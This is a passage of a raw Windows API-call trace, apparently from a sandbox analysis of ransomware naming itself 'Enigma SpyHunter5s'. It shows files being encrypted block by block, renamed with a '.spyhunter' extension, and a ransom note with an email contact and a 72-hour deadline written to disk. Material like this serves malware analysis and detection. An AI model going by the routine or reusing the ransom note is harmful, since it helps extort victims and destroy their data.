(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.417] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe38*=0x2ac, lpOverlapped=0x0) returned 1 [0087.417] CloseHandle (hObject=0x16c) returned 1 [0087.417] GetProcessHeap () returned 0x2c0000 [0087.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372b28 | out: hHeap=0x2c0000) returned 1 [0087.417] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdd8 | out: pbBuffer=0x270fdd8) returned 1 [0087.417] GetProcessHeap () returned 0x2c0000 [0087.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.417] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdd0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdd0*=0x30) returned 1 [0087.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.417] GetProcessHeap () returned 0x2c0000 [0087.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.417] GetProcessHeap () returned 0x2c0000 [0087.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372a40 | out: hHeap=0x2c0000) returned 1 [0087.418] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdd0 | out: pbBuffer=0x270fdd0) returned 1 [0087.418] GetProcessHeap () returned 0x2c0000 [0087.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.418] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdc8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdc8*=0x30) returned 1 [0087.418] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.418] GetProcessHeap () returned 0x2c0000 [0087.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.418] GetProcessHeap () returned 0x2c0000 [0087.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x324638 | out: hHeap=0x2c0000) returned 1 [0087.418] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdd0 | out: pbBuffer=0x270fdd0) returned 1 [0087.418] GetProcessHeap () returned 0x2c0000 [0087.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.418] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdc8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdc8*=0x30) returned 1 [0087.418] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.418] GetProcessHeap () returned 0x2c0000 [0087.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.418] GetProcessHeap () returned 0x2c0000 [0087.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3583a0 | out: hHeap=0x2c0000) returned 1 [0087.418] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdc8 | out: pbBuffer=0x270fdc8) returned 1 [0087.418] GetProcessHeap () returned 0x2c0000 [0087.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.418] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdc0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdc0*=0x30) returned 1 [0087.418] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.419] GetProcessHeap () returned 0x2c0000 [0087.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.419] GetProcessHeap () returned 0x2c0000 [0087.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358470 | out: hHeap=0x2c0000) returned 1 [0087.419] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdc8 | out: pbBuffer=0x270fdc8) returned 1 [0087.419] GetProcessHeap () returned 0x2c0000 [0087.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.419] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdc0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdc0*=0x30) returned 1 [0087.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.419] GetProcessHeap () returned 0x2c0000 [0087.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.419] GetProcessHeap () returned 0x2c0000 [0087.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d5b8 | out: hHeap=0x2c0000) returned 1 [0087.419] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdc0 | out: pbBuffer=0x270fdc0) returned 1 [0087.419] GetProcessHeap () returned 0x2c0000 [0087.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.419] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdb8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdb8*=0x30) returned 1 [0087.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.419] GetProcessHeap () returned 0x2c0000 [0087.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.419] GetProcessHeap () returned 0x2c0000 [0087.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384aa0 | out: hHeap=0x2c0000) returned 1 [0087.420] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdc0 | out: pbBuffer=0x270fdc0) returned 1 [0087.420] GetProcessHeap () returned 0x2c0000 [0087.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.420] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdb8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdb8*=0x30) returned 1 [0087.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.420] GetProcessHeap () returned 0x2c0000 [0087.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.421] GetProcessHeap () returned 0x2c0000 [0087.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358540 | out: hHeap=0x2c0000) returned 1 [0087.421] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.421] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.421] WriteFile (in: hFile=0x16c, lpBuffer=0x270fcef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fe18, lpOverlapped=0x0 | out: lpBuffer=0x270fcef*, lpNumberOfBytesWritten=0x270fe18*=0x127, lpOverlapped=0x0) returned 1 [0087.422] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.422] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fe18, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fe18*=0x2ac, lpOverlapped=0x0) returned 1 [0087.422] CloseHandle (hObject=0x16c) returned 1 [0087.423] GetProcessHeap () returned 0x2c0000 [0087.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372958 | out: hHeap=0x2c0000) returned 1 [0087.423] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdb8 | out: pbBuffer=0x270fdb8) returned 1 [0087.423] GetProcessHeap () returned 0x2c0000 [0087.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.423] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fdb0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fdb0*=0x30) returned 1 [0087.423] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.423] GetProcessHeap () returned 0x2c0000 [0087.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.423] GetProcessHeap () returned 0x2c0000 [0087.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3726a0 | out: hHeap=0x2c0000) returned 1 [0087.423] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdb0 | out: pbBuffer=0x270fdb0) returned 1 [0087.423] GetProcessHeap () returned 0x2c0000 [0087.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.423] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fda8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fda8*=0x30) returned 1 [0087.423] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.424] GetProcessHeap () returned 0x2c0000 [0087.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.424] GetProcessHeap () returned 0x2c0000 [0087.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383950 | out: hHeap=0x2c0000) returned 1 [0087.424] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fdb0 | out: pbBuffer=0x270fdb0) returned 1 [0087.424] GetProcessHeap () returned 0x2c0000 [0087.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.424] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fda8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fda8*=0x30) returned 1 [0087.424] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.439] GetProcessHeap () returned 0x2c0000 [0087.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.439] GetProcessHeap () returned 0x2c0000 [0087.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354430 | out: hHeap=0x2c0000) returned 1 [0087.439] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fda8 | out: pbBuffer=0x270fda8) returned 1 [0087.439] GetProcessHeap () returned 0x2c0000 [0087.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.439] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fda0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fda0*=0x30) returned 1 [0087.439] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.440] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 77 [0087.440] StrStrW (lpFirst="MSSOAPR3.DLL", lpSrch=".txt") returned 0x0 [0087.440] GetProcessHeap () returned 0x2c0000 [0087.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x378050 [0087.440] ReadFile (in: hFile=0x16c, lpBuffer=0x378050, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd64, lpOverlapped=0x0 | out: lpBuffer=0x378050*, lpNumberOfBytesRead=0x270fd64*=0x2800, lpOverlapped=0x0) returned 1 [0087.465] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.465] WriteFile (in: hFile=0x16c, lpBuffer=0x378050*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd64, lpOverlapped=0x0 | out: lpBuffer=0x378050*, lpNumberOfBytesWritten=0x270fd64*=0x2800, lpOverlapped=0x0) returned 1 [0087.466] GetProcessHeap () returned 0x2c0000 [0087.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378050 | out: hHeap=0x2c0000) returned 1 [0087.466] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.466] WriteFile (in: hFile=0x16c, lpBuffer=0x270fda4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd64, lpOverlapped=0x0 | out: lpBuffer=0x270fda4*, lpNumberOfBytesWritten=0x270fd64*=0x4, lpOverlapped=0x0) returned 1 [0087.481] WriteFile (in: hFile=0x16c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd64, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd64*=0x30, lpOverlapped=0x0) returned 1 [0087.481] CloseHandle (hObject=0x16c) returned 1 [0087.488] GetProcessHeap () returned 0x2c0000 [0087.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x387298 [0087.489] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.spyhunter") returned 87 [0087.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.spyhunter")) returned 1 [0087.507] GetProcessHeap () returned 0x2c0000 [0087.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x387298 | out: hHeap=0x2c0000) returned 1 [0087.507] GetProcessHeap () returned 0x2c0000 [0087.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.507] GetProcessHeap () returned 0x2c0000 [0087.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372cf8 | out: hHeap=0x2c0000) returned 1 [0087.507] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fda8 | out: pbBuffer=0x270fda8) returned 1 [0087.507] GetProcessHeap () returned 0x2c0000 [0087.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.507] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fda0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fda0*=0x30) returned 1 [0087.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\odbcmon.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0087.557] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL") returned 71 [0087.557] StrStrW (lpFirst="ODBCMON.DLL", lpSrch=".txt") returned 0x0 [0087.557] GetProcessHeap () returned 0x2c0000 [0087.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37a898 [0087.557] ReadFile (in: hFile=0x174, lpBuffer=0x37a898, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd64, lpOverlapped=0x0 | out: lpBuffer=0x37a898*, lpNumberOfBytesRead=0x270fd64*=0x2800, lpOverlapped=0x0) returned 1 [0087.651] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.651] WriteFile (in: hFile=0x174, lpBuffer=0x37a898*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd64, lpOverlapped=0x0 | out: lpBuffer=0x37a898*, lpNumberOfBytesWritten=0x270fd64*=0x2800, lpOverlapped=0x0) returned 1 [0087.651] GetProcessHeap () returned 0x2c0000 [0087.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a898 | out: hHeap=0x2c0000) returned 1 [0087.652] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.652] WriteFile (in: hFile=0x174, lpBuffer=0x270fda4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd64, lpOverlapped=0x0 | out: lpBuffer=0x270fda4*, lpNumberOfBytesWritten=0x270fd64*=0x4, lpOverlapped=0x0) returned 1 [0087.667] WriteFile (in: hFile=0x174, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd64, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd64*=0x30, lpOverlapped=0x0) returned 1 [0087.667] CloseHandle (hObject=0x174) returned 1 [0087.677] GetProcessHeap () returned 0x2c0000 [0087.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3972e0 [0087.677] wnsprintfW (in: pszDest=0x3972e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL.spyhunter") returned 81 [0087.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\odbcmon.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\odbcmon.dll.spyhunter")) returned 1 [0087.678] GetProcessHeap () returned 0x2c0000 [0087.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3972e0 | out: hHeap=0x2c0000) returned 1 [0087.678] GetProcessHeap () returned 0x2c0000 [0087.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.679] GetProcessHeap () returned 0x2c0000 [0087.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340cb0 | out: hHeap=0x2c0000) returned 1 [0087.679] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fda0 | out: pbBuffer=0x270fda0) returned 1 [0087.679] GetProcessHeap () returned 0x2c0000 [0087.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0087.679] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd98*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd98*=0x30) returned 1 [0087.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mssoap30.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.679] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL") returned 72 [0087.679] StrStrW (lpFirst="MSSOAP30.DLL", lpSrch=".txt") returned 0x0 [0087.679] GetProcessHeap () returned 0x2c0000 [0087.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x375808 [0087.679] ReadFile (in: hFile=0x16c, lpBuffer=0x375808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd5c, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesRead=0x270fd5c*=0x2800, lpOverlapped=0x0) returned 1 [0087.691] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.691] WriteFile (in: hFile=0x16c, lpBuffer=0x375808*, nNumberOfBytesToWrite=0x2800, 